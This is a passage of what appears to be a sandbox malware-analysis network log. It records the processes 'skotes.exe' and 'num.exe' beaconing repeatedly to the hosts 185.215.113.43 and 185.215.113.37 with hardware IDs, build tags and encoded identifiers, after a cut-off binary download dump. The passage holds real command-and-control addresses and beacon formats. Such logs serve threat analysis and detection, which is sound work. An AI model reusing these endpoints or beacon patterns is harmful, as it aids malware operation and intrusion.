                                                                                                                                      Oct 7, 2024 03:23:18.561230898 CEST1236INData Raw: 47 b8 ed 54 fc 94 72 1f 95 3e b2 dd 2c b2 90 2e 96 39 c0 26 bb ec 92 fa 2c 32 ce ca 7c a0 06 c8 cb a7 9a 5e 1f 62 2c 9c 58 f2 72 50 02 d6 eb fa 41 ae f9 96 e5 14 ed f1 f8 31 ee a3 3b f5 06 b8 58 f6 b8 01 09 bd c3 ea 22 b7 c5 9e d8 e8 5f 1f d6 26
                                                                                                                                      Data Ascii: GTr>,.9&,2|^b,XrPA1;X"_&r&&6hFs*4^zG#.V[\cO9~u&u<Kk:DBnXGmRPr!Lul}szm}j %_pR[b_knb$YZ@\>$
                                                                                                                                      Oct 7, 2024 03:23:18.566178083 CEST1236INData Raw: 2d 42 f0 fd 9e 28 75 48 fe 72 6a 07 f2 b2 84 1e 6c 7d 32 86 13 21 aa 14 08 1d d5 0b cd eb 00 32 ba 44 f8 62 58 e8 58 24 d7 41 54 06 67 d8 17 8f a8 01 64 ea 88 87 24 c9 ae b3 f2 a9 dd a1 55 d5 8c 55 b5 35 1b e9 e9 6f a0 12 c2 00 9f b4 66 35 43 c9
                                                                                                                                      Data Ascii: -B(uHrjl}2!2DbXX$ATgd$UU5of5C~zS>d09+@DC2WO@n Q9g.YX^25oSysV'/`~(j.p#<##_V(% Z!^j$Ji HA(:*l@6{


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.461038185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:22.368422985 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 31
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                      Data Ascii: d1=1000349001&unit=246122658369
                                                                                                                                      Oct 7, 2024 03:23:23.082109928 CEST193INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:22 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.461057185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:24.809923887 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:25.531218052 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.461077185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:27.056422949 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:27.772893906 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:27 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.461096185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:29.422569990 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:30.115160942 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:30 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.461114185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:31.645096064 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:32.348572016 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.461131185.215.113.37806516C:\Users\user\AppData\Local\Temp\1000336001\num.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:33.784095049 CEST89OUTGET / HTTP/1.1
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Oct 7, 2024 03:23:34.498110056 CEST203INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:34 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 0
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Oct 7, 2024 03:23:34.504707098 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJE
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Content-Length: 211
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a
                                                                                                                                      Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="build"doma------AEBKKECBGIIJJKECGIJE--
                                                                                                                                      Oct 7, 2024 03:23:34.740411043 CEST210INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:34 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 8
                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                      Data Ascii: YmxvY2s=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.461132185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:34.051592112 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:34.750972986 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:34 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.461145185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:36.279851913 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:36.983124971 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:36 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.461161185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:38.616050005 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:39.315959930 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:39 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.461175185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:40.834882975 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:41.568331003 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:41 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.461177185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:43.240765095 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:43.940942049 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.461178185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:45.538923025 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:46.233464956 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:46 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.461179185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:47.889134884 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:48.577404976 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:48 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.461180185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:50.141510010 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:50.834237099 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:50 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.461181185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:52.469249964 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:53.168205023 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:53 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.461182185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:54.678998947 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:55.810066938 CEST196INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:55 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.461183185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:57.447499990 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:58.163953066 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:58 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      25192.168.2.461184185.215.113.3780
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:58.386262894 CEST89OUTGET / HTTP/1.1
                                                                                                                                      Host: 185.215.113.37
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Oct 7, 2024 03:23:59.079961061 CEST203INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:58 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Content-Length: 0
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
